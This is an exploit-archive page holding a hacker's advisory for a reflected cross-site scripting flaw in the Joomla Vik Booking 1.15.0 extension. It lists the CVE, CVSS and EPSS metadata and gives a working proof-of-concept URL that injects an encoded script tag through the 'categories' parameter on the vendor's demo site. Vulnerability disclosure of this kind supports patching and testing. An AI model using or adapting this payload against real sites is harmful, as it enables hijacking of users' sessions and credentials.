Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-26387 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2022-10-08 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N | 0.02192 | 0.50148 |
C r a C k E r T H E C R A C K O F E T E R N A L M I G H T From The Ashes and Dust Rises An Unimaginable crack.... [ Exploits ] : Author : CraCkEr : Website : extensions.joomla.org Vendor : e4j Extensions for Joomla - extensionsforjoomla.com Software : Joomla Vik Booking 1.15.0 Vuln Type: Reflected XSS Method : GET Impact : Manipulate the content of the site B4nks-NET irc.b4nks.tk #unix : : Release Notes: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob CraCkEr 2022 Path: /index.php/en/booking GET parameter 'categories' is vulnerable to XSS https://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103 [-] Done
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.